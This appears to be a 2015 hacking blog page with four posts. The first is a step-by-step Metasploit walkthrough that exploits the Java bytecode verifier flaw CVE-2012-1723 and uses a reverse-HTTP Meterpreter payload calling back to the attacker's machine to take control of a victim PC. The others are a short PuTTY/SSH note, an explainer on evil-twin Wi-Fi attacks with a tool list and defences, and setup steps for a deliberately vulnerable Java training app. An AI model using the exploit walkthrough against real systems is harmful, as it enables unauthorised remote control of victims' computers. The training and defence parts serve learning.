Saturday, 28 March 2015

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: This is a vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.
Requirement:
  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type “msfupdate” , this will update the metasploit with latest modules.
Now type “msfconsole” to get interaction with the Metasploit framework.
Step 2:
Type “use exploit/multi/browser/java_verifier_field_access” and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit
Step 3:
If you follow the above commands correctly, you will get the following result.
Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.
Now type “sessions“, this will show the list of active sessions .
Type “sessions -i 1“, this will open the connection to the session with the id ‘1’ and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.
References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/

How to connect ssl to backtrack using putty



The video is created by Vishnu Sharma. In this video he has showed u how to run ssh service in u r backtrack or any Linux machine using putty .
The download link of putty: http://putty.org

Evil Twin and Fake Wireless Access Point Hacks: What They Are, How To Defend

Hacking is a term with a wide variety of acts associated with it. Some are incredibly complex and demand a high degree of knowledge, others are little more than installing some software on your device and acting a bit…less than ethically.
One of the most common hacks is also one of the easiest to defend against. This is what is known as a fake wireless access point. Hackers use this tactic to easily steal data of unsuspecting wireless users in public places.
What is a fake wireless access point data theft?
This type of attack has a number of nicknames associated with it: AP Phishing, Wi-Fi Phishing, Hotspotter, Evil Twins, and Honeypot AP. All of these are associated with creating a fake Wi-Fi connection that people log into, and whose goal is to steal credentials, logins, and passwords.
To accomplish this, hackers simply use a piece of software, or app, that is designed to capture data that is sent over a wireless connection. Examples of software that is sued during a fake Wi-Fi attack includes:
  • AirSSL
  • AirJack
  • Airsnarf
  • Dsniff
  • Cain
  • void11
No matter which apps are used, the key to it all is setting up a wireless connection that people will want to connect to. When they go to connect to the wireless point they likely won’t suspect a thing. Why? Because this tactic is used most often in public areas.
If you were to go into your local Starbucks, sit down with your mochalatte venti with cream and sugar pumpkin spice, and open up your tablet, finding a connection labelled ‘Starbucks Free WiFi,’ you’d probably connect in a heartbeat (on which is quicken by caffeine, at that). The same goes if you’re on a layover at JFK and you see a connection labelled ‘JFK Free Wi-Fi.- You wouldn’t think twice. That’s what the hackers are counting on – you not thinking.
How is your data stolen during a fake wireless access point theft?
How your most important data is stolen is a little shocking – you give it to them. A large percentage of these hacks take place with a fake wireless point that requires a login and password. Once that information is put into the login, hackers will take it and use it to sign into popular websites, assuming that you use the same login and password for multiple sites.
When your online accounts start showing charges that you didn’t initiate, or if your social media account is taken over, you could be the victim of a fake wireless access point data theft.
How to defend against an ‘Evil Twin’ attack?
There are a number of ways to defend against it, I’ll look at some easy to understand examples:
  • The best defence is to always verify with the wifi provider. Ask the Starbucks staff what their wi-fi is called, it can save you a massive headache. Always remember – if a deal seems too good to be true, like free wifi, it probably is.
  • Use different login details and passwords for public wifi.
    Disconnect auto-connect when you’re in unfamiliar territory.
  • Be cautious when connects suddenly disconnect, especially if it happens for everyone on the network. An app known as aireplay is capable of disconnecting users from wifi, hoping that they’ll reconnect to their fake wifi.
  • Be cautious of certificates. Good websites can occasionally send you one, but if this happens over a public wifi that you don’t know, it is best to back off.
  • If a wifi hotspot is interfering with your VPN, forcing you to shut it down, that is a HUGE red flag. A VPN is a great defence against this attack, and hackers know it. Forcing your VPN to disable when you’re trying to connect is the only way that they can steal your data.
That last point is one I want to look at further. A VPN can be a great defence against this type of attack because it encrypts all of the data that you send out. With this data being encrypted, even when you create your login and password with the fake wifi, your data can not be stolen because it can not be deciphered. We review our Top 10 VPNs over on our website if you’re interested in learning more about them.
A last option that I’ll suggest is using SSL-protected apps. These do take more care and thought to use, but they will offer you protection that is similar to a VPN. Some hackers have even found a way around SSL protection ( the BREACH method), so you may want to explore using this with a secondary defensive measure.
The overall advice is to be cautious and verify before you connect. People look at me weird all the time when I ask for the correct wifi name that I should use to connect to. I’ve never been the victim of an ‘Evil Twin’ attack…I’ll take a funny look or two!

Java Vulnerable Lab – Learn to Hack and secure Java based Web Applications

Pentesting Lab
We (Cyber Security and Privacy Foundation) have developed a vulnerable Java based Web Applicatoin . This app is intended for the Java Programmers and other people who wish to learn about Web application vulnerabilities and write secure code.
The full course on Hacking and Securing Web Java Programs is available in
Warning: Don’t run this app in Your Main Machine or in an online server. Install it in Vitual Machine.
How to setup Java Vulnerable Lab?
Method 1.Very Easiest Method : VirtualBox VM The Most easiest way to use Java Vulnerable is using the VirtualBox VM which has everything set up and ready to use.
Steps:
  1. Install the VirtualBox : https://www.virtualbox.org/wiki/Downloads
  2. Download the VM Image from here : http://sourceforge.net/projects/javavulnerablelab/files/v0.1/JavaVulnerableLab.ova/download
  3. Import the JavaVulnerable.ova into VirtualBox.
  4. Change the Network Settings to Host-Only Network 
  5. Start the Machine and Log into the Machine( Credentials; username: root password: cspf) 
  6. Start Tomcat by entering "service tomcat start" in the Terminal
  7. Start mysql by entering "service mysql start" in the Terminal
  8. Find the IP Address of Machine
  9. In your Browser, go to "http://[IP_ADDRESS_OF_VM]:8080/JavaVulnerableLab/install.jsp 
  10. Click the Install Button
  11. Enjoy :)


Method 2.Easiest Method : Standalone Web Application In this mehtod, you will be running an executable “JAR” file which runs the application with an embedded Apache Tomcat.
Steps:

    1. Install JDK
    2. Download Executable Jar from here: http://sourceforge.net/projects/javavulnerablelab/files/v0.2/JavaVulnerableLab.jar/download
    3. Double Click the JavaVulnerable.jar to run( if double click is not working, run this command "java -jar JavaVulnerable.jar" in your Terminal or CMD)
    4. In your Browser, go to "http://localhost:8080/JavaVulnerableLab/install.jsp 
    5. Click the Install Button

Method 3. Using War file: This is a NORMAL method to deploy the WAR file.
Steps:
   1. Install Apache Tomcat server
   2. Go to http://[Tomcat_INSTALLED_IP]:8080/manager/  (make sure you have modified tomcat-users.xml file of the tomcat to allow the manager).
   3. Download our WAR file from here: https://sourceforge.net/projects/javavulnerablelab/files/latest/JavaVulnerableLab.war/download
   4. Deploy the WAR in Apache Tomcat manager.
   5. Go to http://[Tomcat_INSTALLED_IP]:8080/JavaVulnerableLab/install.jsp 
   6. Click the Install Button